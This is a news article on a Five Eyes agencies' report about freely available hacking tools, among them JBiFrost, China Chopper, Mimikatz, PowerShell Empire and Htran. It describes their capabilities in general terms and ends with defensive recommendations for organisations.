As attackers ranging from nation-state backed espionage groups to cyber criminal operations are increasingly turning to openly available hacking tools to help conduct campaigns, the cyber security authorities of Australia, Canada, New Zealand, the UK and US have warned.
The research by the nations involved in the ‘Five Eyes’ intelligence sharing arrangement provides a snapshot of some of threats posed by cyber actors worldwide by detailing some of the common commonly available tools used in attacks.
They are all freely available – often on the open web – and include remote access trojans, web shells and obfuscation tools. Combinations of some or all of these have been used in in attack campaigns by some of the most prolific attackers around.
“Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states, or criminals on the Dark Web,” said the report.
“Experience from all our countries makes it clear that, while cyber actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated groups use common, publicly-available tools to achieve their objectives,” the report adds.
The UK’s National Cyber Security Agency notes that the list of tools is far from exhaustive, but it’s designed to help network defenders protect against some of the most commonly used free hacking tools.
Remote Access Trojans
Perhaps the most potentially damaging of the dangers detailed in the report are remote access trojans – malware which is secretly installed onto an infected system providing a backdoor to observe all activity and enabling the attacker to carry out commands which lead to data being stolen.
The particular example given in the report is JBiFrost, a trojan typically employed by low-skilled cyber criminals but with the capability to be exploited by state actors. What makes JBiFrost so potent is that it is cross-platform, with the ability to operate on Windows, Linux, MAC OS X and Android.
Often delivered via a phishing email, it allows attackers to move across networks and install additional software. This particular RAT is publicly available and the cyber security agencies said they have observed it being used in targeted attacks against critical national infrastructure owners and their supply chain operators.
Web shells are malicious scripts which attackers upload to targets after an initial compromise in order to gain remote administrative capabilities, providing those behind the attack with the potential to really get their hooks into the target system – as well as being used to pivot to other areas of the network.
One example of freely available Web Shells is China Chopper which has been widely by attackers to remotely access compromised web servers. Once installed on a system, the China Chopper web shell server can be accessed by the attacker at any time – among other things it can copy, rename, delete and even change the time-stamp of files.
Mimikatz is an open-source utility used to retrieve clear text credentials and hashes from memory and has available since 2007. While it wasn’t designed as a hacking tool and has legitimate use-cases, it is also used as a means of gaining access to credentials and admin privileges.
It’s been used in a wide variety of campaigns by various groups – this includes the NotPetya and BadRabbit ransomware attacks – where it was employed to extract administrator credentials from Windows machines in order to help facilitate spread of the attack.
Designed as a legitimate penetration testing tool in 2015, it didn’t take attackers long to realise they could use PowerShell Empire to help conduct malicious activity. The tool allows attackers to escalate privileges, harvest credentials, exfiltrate information and move laterally across a network.
It also comes with the added bonus of operating almost entirely in the memory – making it difficylt to trace – and the fact that because PowerShell is a legitimate operation, malicious activity often goes unnoticed by security software.
C2 obfuscation tools
Unless they don’t care about being discovered, attackers will often look to hide their tracks when compromising a target, using specific tools in order to obfuscate their location and activity.
One which is used in many attacks in Htran, an obfuscation tool which has been freely available on the internet since 2009 and is often reuploaded to places like GitHub. By using this tool, attackers can evade intrusion and detection systems and hide communications with their command and control infrastructure.
The report says a broad range of cyber actors have been observed using Htran in attacks against both government and industry targets.
The cyber security agencies warns that these far from the only freely available hacking tools which are available to attackers. However, there are a number of steps that organisations can take to improve their chances of not falling victim to campaigns using these or similar tools.
Recommendations by the NCSC include using multi-factor authentication, segregating networks, setting up a security monitoring capability and keeping systems and software up to date.
READ MORE ON CYBER SECURITY